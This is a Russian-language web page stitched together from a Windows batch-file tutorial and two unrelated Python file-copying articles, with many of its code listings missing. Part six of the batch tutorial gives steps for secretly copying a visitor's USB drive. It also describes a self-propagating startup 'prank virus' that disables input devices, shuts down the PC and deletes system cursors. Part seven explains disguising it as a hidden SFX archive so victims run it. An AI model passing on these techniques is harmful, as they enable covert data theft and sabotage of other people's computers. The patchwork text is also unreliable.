Как написать программу копирования файлов

Содержание

На первый взгляд может показаться, что данные возможности системы абсолютно бесполезны для рядового пользователя, однако это не совсем так. При помощи пакетных файлов можно существенно упростить рутинную работу с ПК, сделать её удобнее, воспользоваться некоторыми скрытыми возможностями.
Новатором и пионером в данной области я, само собой, не являюсь, просто постараюсь изложить здесь базовое представление об этом типе файлов, рассмотреть некоторые примеры и остановиться на парочке деталей и тонкостей, касающихся так называемых батников .

Для удобства написания и, естественно, восприятия разобью статью по разделам. Но сначала:

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Некоторые манипуляции с пакетными файлами могут нанести вред системе (порой даже непоправимый), поэтому предупреждаю сразу, ни автор статьи, ни администрация сайта не несут абсолютно никакой ответственности за последствия, которые может повлечь за собой выполнение действий, представленных в этой статье. Все материалы представлены здесь исключительно с образовательной целью, и для ознакомления. Надеюсь на ваше понимание и прямоту ваших рук.

Урок #7. Резервное копирование файлов в Windows 10

Часть первая. Основные моменты при создании bat-файлов

  • Выше уже упоминалось, что пакетный файлы — это обычные текстовые документы. Так и есть, но для того, чтобы они работали и выполняли свои функции, им нужно придать подобающий вид, т.е. поменять расширение. Вообще в Windows используется как расширение *.bat, так и *.cmd, по сути они отличаются весьма незначительно лишь некоторыми нюансами, поэтому, в целях избежания путаницы, будем говорить о bat-файлах. Т.е. чтобы создать исполняемый пакетный файл, мы открываем стандартный блокнот (либо другой, привычный вам текстовый редактор), вбиваем туда нужные нам команды и сохраняем файл с любым именем и расширением bat;
  • По сути, перечень команд, описанных в пакетном файле (батнике) может быть воспроизведён вручную в командной строке (пуск — все программы — стандартные — командная строка), упаковываем их (команды) мы исключительно для удобства, простоты и моментальности (если позволите) воспроизведения;
  • Если испытываете что-то серьёзное и не уверенны в своих действиях, лучше испытывайте детище к примеру на виртуальной машине (в крайнем случае — на компьютере соседа);
  • Список возможных к использованию команд очень велик, посмотреть его можно, набрав в командной строке help, здесь же будут расшифровываться команды по мере их появления в создаваемых батниках;
  • Все инструкции, приведённые в статье, тестировались на ОС Windows XP и Windows 7.

Часть вторая. Синтаксис при написании bat-файлов

  • Каждая команда вводится с новой строчки;
  • Все команды выполняются последовательно за исключением тех случаев, когда внутри самого батника присутствует переход к определённой его части;
  • Комментарии в пакетный файл могут быть добавлены двумя способами:
    — либо после двух двоеточий ::переход к части копирования — либо при помощи команды goto, т.е. вводится команда goto, потом место для перехода, а между ними сам комментарий

goto begin —————————————- Это батник служит для резервного копирования дипломной работы —————————————- begin

Приступим.

Часть третья. Резервное копирование при помощи батников

Резервное копирование данных — полезное и оттого весьма распространенное явление.

Уроки C# – File, FileStream, StreamWriter – работа с файлами, копирование, перемещение, запись – C#

Существует большое количество программ, отличающихся друг от друга функционалом, условиями распространения, уровнем (глубиной вопроса) и т.д. Бесспорно, пользоваться хорошей и красивой программой удобно и приятно, но если ваши задачи не слишком сложны, то элементарное создание бэкапов можно организовать и без использования стороннего софта, исключительно средствами ОСи.

Автоматическое копирование каталогов в папку backup

Для копирования каких-либо данных используется команда copy (копирование файла/файлов) или xcopy (копирование каталогов). Т.е., допустим, нам необходимо делать бэкап содержимого папки, в которой находятся ваши данные к дипломной работе (материалы, приложения, черновик самой работы и т.д.).
В этом случае текст будет следующим

Где D:diplom — папка расположения всех материалов к диплому, а E:backupdiplom — конечная директория резервной копии.
Создаём батник, кидаем его в автозагрузку (пуск — все программы — автозагрузка), и при каждом включении компьютера будет создаваться резервная копия (рк).Чуть усложним. Сделаем, чтобы при включении ПК старые данные сохранялись в папочке diplom_old, а новые в папочке diplom. Тогда батник будет иметь вид

del удаляет ранее созданную вторую рк.
rmdir переименовывает первую рк во вторую.
xcopy создаёт новую рк.
Атрибут /s применяет команду ко всем подкаталогам, атрибут /q отключает запрос на подтверждение действий.Если в двух копиях смысла нет, можно сделать так, чтобы заменялись только те файлы, которые были изменены, те же, которые не изменились, либо вообще были удалены из исходной папки, затронуты не будут. Для этого пишем следующее

Создание бэкапа в архиве

Ну и последнее, что здесь стОит рассмотреть, наверное, на данном этапе — это бэкапы в архиве
Рассмотрим изменённую предыдущую ситуацию. Допустим, нам надо, чтобы при каждом включении ПК создавалась копия папки, запакованная в архив.
Нам необходимо в автозагрузку положить батник со следующим содержимым

Архив папки D:diplom будет создаваться в E:backup, именем будет дата и время создания архива, т.е., например 16-Aug-12–14-06-53

Часть четвертая. Автоматизация процесса создания и удаления файлов/каталогов с использованием bat-файлов

Как создать папку из батника

Начнём с самого простого. Создание папки. Папка создаётся командой MD
Чтобы создать папку с именем backup в корне диска D:, нам необходимо собрать следующего вида пакетный файл

Если же, допустим, нужна каждый день новая папочка с датой на месте имени, то батник будет иметь вид

Здесь строчкой set datetemp=%date:~-10% мы создаём переменную datatemp на время работы батника и присваиваем ей 10 символов значения системной даты;

Как создать текстовый файл из батника

С созданием пустых текстовых файлов дело чуть сложнее. Такой команды просто нет, нужно что-то в этот файл писать. Чтобы выйти из ситуации воспользуемся значением nul (это даже не нулевое значение, а его отсутствие)

Читайте также:
Пример программы на делфи 7

Также, как и в примере с папкой, можно сделать именем текущую дату

Автоматическая очистка папки из батника

Теперь, что касается удаления. Тоже достаточно часто используемая область работы для батников. Так, например, без помощи спец.программ можно при каждом запуске (опять же, поместив пакетный файл в автозагрузку) очищать temp на вашей машине. Содержимое будет следующим

Строчкой cd «C:WindowsTemp» мы переходим в папку temp
Строкой echo Y|del *.* удаляем содержимое этой папки (не саму папку!)

Часть пятая. Прочие возможности bat-файлов

Возможностей, на самом деле, огромное множество. Здесь для примера рассмотрим некоторые из них.

Одна из самых известных возможностей использования батников — это запись содержимого каталога в файл

После выполнения этого файла, в папке, откуда он запускался, будет создан файлик file.txt , содержащий перечень всех файлов и папок в этом каталоге с указанием размера и даты последнего изменения. Можно преобразовать этот файл до вида

/S заставит батник показать содержимое не только каталога, но и всех подкаталогов.
c: поможет отобразить содержимое не того каталога, откуда запускается бат-файл, а нужного нам.
X:file.txt сохранит конечный файл со списком содержимого в указанное нами место;

Запуск файлов из командной строки

Очень часто полезным оказывается возможность запуска объектов из командной строки (в данном случае уже из бат-файлов). Причем как программ, так и других видов файлов (графических изображений, медиафайлов, текстовых документов и т.п.)
К примеру, если в автозагрузку добавить текстовый документ, то при включении ПК после загрузки системы вы его сразу увидите. Либо откроется плеер и будет проигрывать соответствующий трек. (Подробнее про способы добавления файлов в автозагрузку вы можете прочитать в статье: Автозагрузка. Добавление приложений в автозагрузку Windows)
Для того, чтобы это реализовать, нужно просто в теле бат-файла прописать точный путь до необходимого объекта. Например

Для системных же программ нужно указать лишь её обозначение.

При выполнении этого батника откроется калькулятор. В данном случае строчку chcp 1251 можно опустить (как и в некоторых ситуациях из примеров выше), однако если уж стандартизировать все наши пакетный файлы, то её можно и оставить, вреда не будет.

Часть шестая. Хитрости или шутки в сторону

Здесь рассмотрим ещё несколько интересных возможностей для применения батников. Из названия ясно, что некоторые из действий могут навредить системе (хотя это можно сделать и «голыми руками»), но если делать всё с умом, то может выйти достаточно интересно.

Шпионские штучки. Похищаем содержимое флешки

В самом начале статьи было указанно, что команды в батниках выполняются последовательно, если это не оговорено в самом теле исполнительного файла. Рассмотрим именно этот частный случай. Нуууу, допустим.

Вы знаете, что к вам придёт знакомый (а может, знакомая) с просьбой произвести какие-то манипуляции с его/её флэш-карточкой, и вам очень хотелось бы слить все данные с этого накопителя на ваш ПК. Но делать это при госте не совсем удобно, да и просто можно получить «красную карточку». Что мы в таком случае делаем? Создаём батник следующего содержания

Создаём на этот бат-файл ярлычок, в свойствах ярлыка указываем, чтобы файл запускался в свёрнутом состоянии. Дважды кликаем по ярлыку. Что имеем.
:test обозначает начало действия батника
if exist g: goto go проверяет наличие в компьютере диска G:, если он есть, то переходим к части :go (суть в том, что обычно вставленная флешка получает для обозначения первую свободную в системе букву латинского алфавита, проследить это на своём компе не так уж сложно. Вот именно эту буковку мы и указываем вместо G:)
goto test если диск G: не был найден, возвращаемся к началу части :test
:go обозначает начало действия второй части батника
xcopy «G:*.*» «C:упс*.*» копирует всё содержимое диска G: в папку упс на диске C:
Т.е. после того, как мы запустили файл с ярлыка, он запускается в свёрнутом состоянии и циклически проверяет наличие флешки в ПК. Как только флешка там засветится, начнётся копирование всех данных с неё в указанную папку, причем привычного окна копирования файлов не выскочит, всё будет отображаться в свёрнутом окне терминала.Ну, всё что было описанно выше, полезно на своём компе, однако есть несколько плюшек, с помощью которых можно подшутить над другом/подругой.

Маленький вирус в автозагрузку

В общем виде всё будет выглядеть так: отправляем человечку файлик любым удобным способом, он запускает его на своём ПК, мы немного смеёмся, а потом говорим человечку, в чём соль и как всё исправить.Обычно, если что-то идёт не так, рядовой юзер первым делом перезагружает комп. Чтобы наш батник продолжал действовать и после рестарта, необходимо добавить его в автозагрузку (подчеркиваю, такие шутки проходят только с не самыми прошаренными пользователями ПК, более опытные, скорее всего, запросто найдут причину метаморфоз системы и легко избавятся от неё). Для этого в батничке пропише следующее

copy %0 c:»documents and settings»»all users»»главное меню»программыавтозагрузка copy %0 %USERPROFILE%AppDataRoamingMicrosoftWindows»Start Menu»ProgramsStartup

Первая строка добавляет файл в автозагрузку для всех пользователей на Windows XP (для конкретного пользователя в качестве пути указываем %USERPROFILE%»Главное меню»ПрограммыАвтозагрузка)
Вторая строка добавляет файл в автозагрузку для Windows 7.

Начало обеих строк в виде copy %0 означает копирование «самого себя».
Это сделали. Ещё нам хотелось бы, чтобы после запуска батника и при каждой загрузке ПК появлялась весёленькая надпись, к примеру, «ТЫ ЛАМЕР!»
Для этого добавляем следующее

Echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%mes.jse echo WSHShell.Popup («ТЫ ЛАМЕР!»); >> %temp%mes.js start %temp%mes.js deltree /y %temp%mes.js

Эта часть основанна на скриптах. Подробно расписывать не буду, кому интересно, найдёт материал в сети. Скажу лишь, что для некоторых ОС вид этого блока может слегка отличаться. Так, например, в семёрке (Win7) скрипт может выглядеть следующим образом

Echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%mes.jse echo WSHShell.Popup («ПИШИ СЮДА ЧТО УГОДНО»); >> %temp%mes.jse start %temp%mes.jse deltree /y %temp%mes.jse

Однако, и первый вариант будет работать.

Также окошко с текстом можно добавить в обход скриптов, оно будет, так сказать, стилизованное, виндовое от текущего пользователя с указанием текущей даты и времени

msg * «ТЫ ЛАМЕР!» >nul

Едем дальше, ближе к вкусностям.
Чтобы наш объект экспериментов растерялся ещё больше, в тело батника по желанию добавляем что-нибудь из следующего:

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul — строка меняет кнопки мыши местами. Весьма забавная штуковина, однако если человечек не отличается уровновешенной психикой, от этого советую отказаться. Чтобы поменять кнопки мыши обратно, заходи в панели управления в пункт мышь и там инвертируем галочку в поле обменять назначение кнопок.

Команда rundll32 keyboard, disable отключит клавиатуру вплоть до следующей перезагрузки, а rundll32 mouse, disable то же самое проделает с мышью. Если батник в автозагрузке, то при рестарте это дело, разумеется, повторится.

rundll32 shell32, SHExitWindowsEx 1 — выключит ПК.

Читайте также:
Инвестиционная программа плата за подключение

rundll32 shell32, SHExitWindowsEx 2 — перезагрузит ПК.

rundll32 url.dll, FileProtocolHandler https://ya.ru/ — откроет в Internet Explorer поисковую страничку яндекса (сайт вместо ya.ru, само собой, можно вписать любой). Если проявить фантазию, можно придать батнику особую пикантность.

Ну и del «%SystemRoot%Cursors*.*» >nul удалит курсоры мыши ( пользоваться с осторожностью и в самых крайних случаях! )

Теперь остаётся только скомпоновать желаемые строки в единый код

Часть седьмая. Упаковка исполнительного файла

Здесь хочу отметить, что мало кто станет запускать ваш батник хотя бы потому, что он имеет немного подозрительный вид. Исправить это можно двумя способами:

Программный способ упаковки батников

  • конвертировать bat-файл в *.exe при помощи какой-нибудь утилитки (например, bat to exe)
  • создать sfx-архив.

Упаковка батников в SFX-архив

Второй вариант в рамках данной статьи чуток подробнее и рассмотрим.
— Для начала нам надо установить на ПК подходящий архиватор (для этих целей я рекомендую WinRAR, т.к. создание sfx-архивов в нём реализовано наиболее удобно и просто).
— Создаём нужный нам пакетный файл (батник).
— Кликаем правой кнопочкой по батнику, выбираем из контекстного меню WinRAR => Добавить в архив (дальше по вкладкам)
— Общие. Имя любое. Формат — RAR. Метод сжатия обычный. В параметрах архивации ставим галочку напротив Создать SFX-архив.
— Дополнительно. Жмём на кнопочку Параметры SFX. Вкладочка «Общие», выполнить после распаковки — вписываем имя архивируемого батника с расширением. Во вкладке «Режимы» в разделе «Режим вывода информации» ставим галочку напротив «Скрыть всё». На вкладочке «Текст и графика» можно, например, добавить симпатичную иконку вашему архиву вместо стандартной.

Если вы не художник, то иконку можно вытащить из любой программы/игры при помощи стороннего софта, например Restorator.
— На этом всё. Остальные опции на ваше усмотрение. Жмём кнопочку ОК. В исходной папке с батником появится ещё и наш новый sfx-архив.
— Чтобы добавить солидность файлу, позволить ему прибавить в весе, можно в архив «напихать» ещё что-нибудь, это может быть что угодно, т.к. цель — только увеличение размера.
— В архиве может быть сколько угодно батников, при создании архива мы указываем, что выполнять нужно первый (прописываем его имя с расширением), чтобы после этого выполнился следующий, в конце (либо в нужном нам месте) пишем

call sled.bat

Т.е. когда дело дойдёт до этой команды, система переключится на исполнение файла с названием sled.bat, а затем вернётся к исходному.
Если же надо, чтобы работа первого батника не прерывалась, то используем другую команду

start sled.bat

Вместо заключения

Стоит отметить, что кроме вышеперечисленных функций при помощи батников можно также редактировать и системный реестр, об этом наша отдельная публикация: Редактирование реестра Windows из командной строки, bat-файлы. Остаётся только напомнить, что вообще команд огромное количество, а вариантов их сочетаний и вовсе — бесконечное множество. Любую команду можно сначала проверить в командной строке, а только потом добавлять в тело пакетного файла.

Будьте осторожны и удачных вам экспериментов

Источник: miradmin.ru

Создаем перекладчик файлов с помощью Python

Существует множество задач, которые можно автоматизировать с помощью программирования. Мы поможем решить одну из них – привести в порядок рабочий стол вашего ПК.

3255 просмотров

Когда на рабочем столе скапливается большое количество самых разных файлов, начиная с каких-либо рабочих документов и заканчивая фотографиями любимого кота, то рано или поздно приходит момент, когда приходится всё это разбирать и расфасовывать по разным папкам. Чтобы не делать это руками, можно написать небольшой скрипт, который будет за нас отправлять «мух» налево, а «котлеты» направо.

Все необходимые для работы с файловой системой функции находятся в модулях os и shutil. Также нам ещё понадобится функция sleep из модуля time. Напишем небольшой каркас нашего скрипта.

# Импорт всех необходимых модулей import shutil import os from time import sleep # Папки из которой и в которую будет происходить перемещение moveFrom = «C:\. \\moveFrom» moveTo = «C:\\. \\moveTo» # Заглушка функции, которая будет перемещать файлы def moveFiles(): pass # Главный цикл скрипта if __name__ == «__main__»: while True: moveFiles() sleep(60)

Теперь разберёмся с тем, какие функции нам понадобятся для осуществления задуманного.

Первая — это listdir из модуля os. Она принимает строку, которая содержит путь до папки и возвращает список со всеми файлами из этой папки.

Вторая необходимая функция — это move из модуля shuti. Она принимает путь до файла, который нужно переместить, и путь, по которому нужно этот файл переместить. Также желательно указать функцию, с помощью которой будет происходить копирование.

Далее приведён листинг функции копирования файлов.

def moveFiles(): # Получение списка файлов, которые нужно переместить needToMove = os.listdir(moveFrom) # Если таких нет, то завершается выполнение функции if len(needToMove) == 0: return # Проход по каждому из файлов for file in needToMove: # Выделение расширения файла fExt = file[file.rfind(‘.’)+1:] # Попытка переместить файл try: shutil.move(moveFrom + «\\» + file, moveTo + «\\» + fExt + «\\» + file, copy_function=shutil.copy2) except FileNotFoundError: # Если попытка не удалась по причине отсутствия папки, то она создаётся и перемещение повторяется dirPath = os.path.join(moveTo, fExt) os.mkdir(dirPath) shutil.move(moveFrom + «\\» + file, moveTo + «\\» + fExt + «\\» + file, copy_function=shutil.copy2)

Вот и всё. Простейший скрипт-перекладчик готов. Теперь он раз в минуту будет сортировать по расширению и перемещать файлы в определённые папки.

Просторы для развития этого скрипта достаточно большие. Например, можно с помощью регулярных выражений осуществлять сортировку файлов не по расширению, а по названию и более грамотно раскладывать их по папкам, но это уже тема для отдельной статьи по регулярным выражениям.

Источник: vc.ru

Копирование файлов в Python

Когда дело доходит до использования Python для копирования файлов, есть два основных способа: использовать модуль shutil или модуль os. Все методы ОС, которые мы здесь показываем, являются методами, которые позволяют нам выполнять команды из нашего кода, который мы будем использовать для выполнения команды копирования (Windows) или команды cp (Unix).

Вы заметите, что многие из этих методов, как в модуле shutil, так и в модуле os, имеют очень похожую функциональность (что не должно вызывать удивления), но каждый из них очень немного отличается по функциональности.

С помощью модуля shutil

Модуль shutil предлагает несколько высокоуровневых методов копирования файлов. Вот основные из них:

copyfile

Этот метод копирует содержимое одного файла в другой. Предоставленное ему место назначения должно быть файлом с возможностью записи и иметь другое имя, чем исходный файл. Если имена совпадают, это вызовет ошибку. Если целевой файл уже существует, он будет заменен вновь скопированным файлом.

Синтаксис этого метода:

shutil.copyfile(src_file, dest_file, *, follow_symlinks=True)

Например, следующий код скопирует файл с именем file1.txt в файл с именем file2.txt:

import shutil shutil.copyfile(‘file1.txt’, ‘file2.txt’)

Одна интересная и потенциально полезная функция shutil.copyfile – логический аргумент follow_symlinks. Если установлено значение False и исходный файл является символической ссылкой, то вместо копирования файла будет создана новая символическая ссылка.

Читайте также:
Как попасть в программу 1000 дворов

copy

Этот метод очень похож на copyfile, с основным отличием в том, что он не только копирует содержимое исходного файла, но и делает еще один шаг вперед, а также копирует разрешения файловой системы. Копирование прав доступа к файлам – нетривиальная задача для большинства языков программирования, так что это хорошая возможность.

shutil.copy(src_file, dest_file, *, follow_symlinks=True)

Каждый из этих параметров такой же, как и в методе copyfile. Например, следующий код скопирует «file1.txt» в «file3.txt».

import shutil shutil.copy(‘file1.txt’, ‘file3.txt’)

Примечание. Убедитесь, что вы не называете свой скрипт таким же, как один из модулей, которые вы импортируете (что я по ошибке сделал при тестировании кода для этой статьи). Если вы это сделаете, то при попытке импортировать этот модуль вы получите сообщение об ошибке из-за проблемы циклического импорта.

copy2

Как и предыдущие методы, метод copy2 идентичен методу копирования, но помимо копирования содержимого файла он также пытается сохранить все метаданные исходного файла. Если платформа не позволяет полностью сохранять метаданные, то copy2 не возвращает ошибку, а просто сохраняет любые метаданные, которые могут.

shutil.copy2(src_file, dest_file, *, follow_symlinks=True)

Опять же, эти параметры такие же, как и в предыдущих командах, которые мы уже упоминали.

Например, следующий код скопирует «file1.txt» в «file4.txt», а также сохранит метаданные исходного файла «file1.txt».

import shutil shutil.copy2(‘file1.txt’, ‘file4.txt’)
$ python copy-files.py $ ls -l total 32 -rw-r—r— 1 scott staff 91 Oct 27 11:26 copy-files.py -rw-r—r— 1 scott staff 6 Oct 27 11:27 file1.txt -rw-r—r— 1 scott staff 6 Oct 27 11:29 file3.txt -rw-r—r— 1 scott staff 6 Oct 27 11:27 file4.txt

Как видно из выполнения нашего кода выше, «file1.txt» был скопирован в «file4.txt». Однако вы могли заметить, что дата создания была сохранена в новом файле, в отличие от shutil.copy, который копирует «file1.txt» в «file3.txt» и дает ему новую дату создания.

copyfileobj

Этот метод копирует содержимое исходного файла в целевой файл из текущей позиции исходного файла. Это означает, что если вы читаете данные из объекта исходного файла, то позиция, в которой вы прекращаете чтение, – это позиция, с которой copyfileobj начинает копирование.

shutil.copyfileobj(src_file_object, dest_file_object[, length])

Значения параметров исходного и целевого файлов аналогичны предыдущим командам, но теперь они относятся к объектам. Параметр длины является необязательным и представляет размер буфера, который представляет собой количество битов, хранящихся в памяти во время процесса копирования. Эта опция может быть полезна при копировании очень больших файлов, поскольку она может ускорить процесс копирования и избежать неконтролируемого использования памяти.

Например, следующий код скопирует “file1.txt” в “file5.txt”

import shutil filename1 = ‘file1.txt’ fileA = open(filename1, ‘rb’) filename2 = ‘file5.txt’ fileB = open(filename2, ‘wb’) shutil.copyfileobj(fileA, fileB)

Как мы видим, чтобы использовать copyfileobj, нам нужно открыть файлы в двоичном режиме (который является частью «b» от «rb» и «wb»). Кроме того, исходный файл должен быть открыт, как доступный для чтения, а целевой файл должен быть открыт, как доступный для записи (части «r» и «w» соответственно).

С помощью модуля os

Модуль os предоставляет возможность использовать функциональные возможности операционной системы для копирования ваших файлов. Мы приведем примеры, которые работают как для Windows, так и для Unix. Они различаются из-за используемых команд оболочки, поэтому не забудьте обратить внимание на то, как каждый вызов функции помечен в комментариях Python.

popen

Этот метод открывает канал к вашей команде. Однако обратите внимание, что этот метод устарел в Python 2.6, поэтому мы не рекомендуем его использовать, если в этом нет необходимости. В качестве альтернативы документация Python советует нам использовать вместо этого методы из модуля подпроцесса.

os.popen(cmd[, mode[, bufsize]])

Здесь возвращаемое значение представляет собой файловый объект, подключенный к каналу. Этот объект может быть прочитан или записан в зависимости от режима. По умолчанию установлен режим «r», который позволяет читать содержимое файла.

В приведенном ниже примере файл file1.txt будет скопирован в file6.txt:

import os # Windows os.popen(‘copy file1.txt file6.txt’) # Unix os.popen(‘cp file1.txt file6.txt’)

Выполнение команды таким образом точно такое же, как если бы вы запускали ее непосредственно из командной строки вашего терминала.

system

Этот метод выполняет указанную команду в подоболочке. Он доступен как для Unix, так и для Windows. Синтаксис следующий:

os.system(command)

Здесь команда – это строка, содержащая команду оболочки DOS или Unix. В нашем случае сюда мы поместим команду copy или cp.

Например, следующий код скопирует file1.txt в file7.txt.

import os # Windows os.system(‘copy file1.txt file7.txt’) # Unix os.system(‘cp file1.txt file7.txt’)

Это выглядит идентично предыдущей команде os.popen, которую мы только что использовали, но команда выполняется в подоболочке, что означает, что она выполняется в отдельном потоке параллельно с вашим исполняемым кодом. Чтобы дождаться его завершения, вам нужно вызвать .wait() для объекта, возвращаемого os.system.

С помощью модуля subprocess

Модуль subprocess предназначен для замены некоторых методов в модуле os (в частности, методов os.system и os.spawn *), и он представляет два основных метода доступа к командам операционной системы. Это методы call и check_output. Еще раз, для систем Unix команду «copy file1.txt file2.txt» следует заменить на «cp file1.txt file2.txt».

call Method

Документация Python рекомендует нам использовать метод call для запуска команды из операционной системы.

subprocess.call(args, *, stdin=None, stdout=None, stderr=None, shell=False)

Параметр args будет включать нашу команду оболочки. Однако небольшое предостережение, поскольку документация Python предупреждает нас, что использование shell = True может быть угрозой безопасности.

Используя этот вызов функции, мы можем запустить нашу команду копирования следующим образом:

import subprocess # Windows status = subprocess.call(‘copy file1.txt file8.txt’, shell=True) # Unix status = subprocess.call(‘cp file1.txt file8.txt’, shell=True)

Как показывает пример выше, нам просто нужно передать строку с помощью команды оболочки, как и раньше.

Как и ожидалось, операционная система скопирует file1.txt в файл с именем file8.txt.

Метод check_output

Этот метод также позволяет нам выполнять команду в оболочке. Это очень похоже на команду subprocess.run, за исключением того, что по умолчанию она передает данные из stdout в виде закодированных байтов. Синтаксис следующий:

subprocess.check_output(args, *, stdin=None, stderr=None, shell=False, universal_newlines=False)

Здесь параметр args включает команду оболочки, которую мы хотим использовать. Еще раз, документация Python предупреждает нас об использовании shell = True, поэтому используйте этот метод с осторожностью.

В следующем коде мы скопируем «file1.txt» в «file9.txt» с помощью команды check_output:

import subprocess # Windows status = subprocess.check_output(‘copy file1.txt file9.txt’, shell=True) # Unix status = subprocess.check_output(‘cp file1.txt file9.txt’, shell=True)

И, как и все команды, которые мы показали в этой статье, это скопирует файл «file1.txt» в указанное нами место назначения.

Заключение

Python предлагает нам множество различных способов копирования файлов, некоторые из которых являются частью набора методов. Другие используют некоторые мощные методы для выполнения команд в оболочке, которые используют команды copy или cp.

Источник: tonais.ru

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru